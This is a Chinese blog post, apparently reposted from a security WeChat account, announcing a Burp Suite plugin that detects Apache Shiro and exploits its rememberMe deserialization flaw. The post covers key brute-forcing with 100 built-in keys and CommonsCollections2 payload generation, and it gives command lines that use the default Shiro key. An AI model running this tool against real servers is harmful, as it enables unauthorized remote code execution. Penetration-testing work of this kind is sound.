Shiro 回显Burp插件(支持burp被动扫描功能

admin 2020年8月6日13:11:11评论2,563 views1字数 735阅读2分27秒阅读模式


此版本改动,支持burp的被动扫描(需要burp pro版本


changelog

  1. 新增shiro 检测方式(对,就是那个不需要gadget的检测方式) 2020.7.30
  2. 新增shiro 100 key
  3. 支持自定义key
  4. 支持作为插件导入burp
  5. 支持burp的被动扫描(需要burp pro版本

被动扫描演示

Shiro 回显Burp插件(支持burp被动扫描功能

检测到shiro框架


Shiro 回显Burp插件(支持burp被动扫描功能

自动探测shiro的key


Shiro 回显Burp插件(支持burp被动扫描功能


burp插件使用方法


Shiro 回显Burp插件(支持burp被动扫描功能


repeater界面中右键,生成payload

Shiro 回显Burp插件(支持burp被动扫描功能


默认kph密钥,cc2利用链,获取信息,如果需要修改,请右键选择configShiro 回显Burp插件(支持burp被动扫描功能



生成后,会自动替换request内容,并攻击

Shiro 回显Burp插件(支持burp被动扫描功能



当然,这个jar包也可以直接在命令行下运行,生成rememberMe,或者检测,一切不变


自定义key检测

java -cp .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/ kPH+bIxk5D2deZiIxcaaaA==

内置100key检测

java -cp .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/
java -jar .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar kPH+bIxk5D2deZiIxcaaaA== CommonsCollections2 XraySysProp

后台回复shiro即可得到下载链接

源码下载请后台回复 source,即可得到github源码地址

欢迎关注 宽字节安全 公众号

Shiro 回显Burp插件(支持burp被动扫描功能



  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月6日13:11:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Shiro 回显Burp插件(支持burp被动扫描功能http://cn-sec.com/archives/82248.html

发表评论

匿名网友 填写信息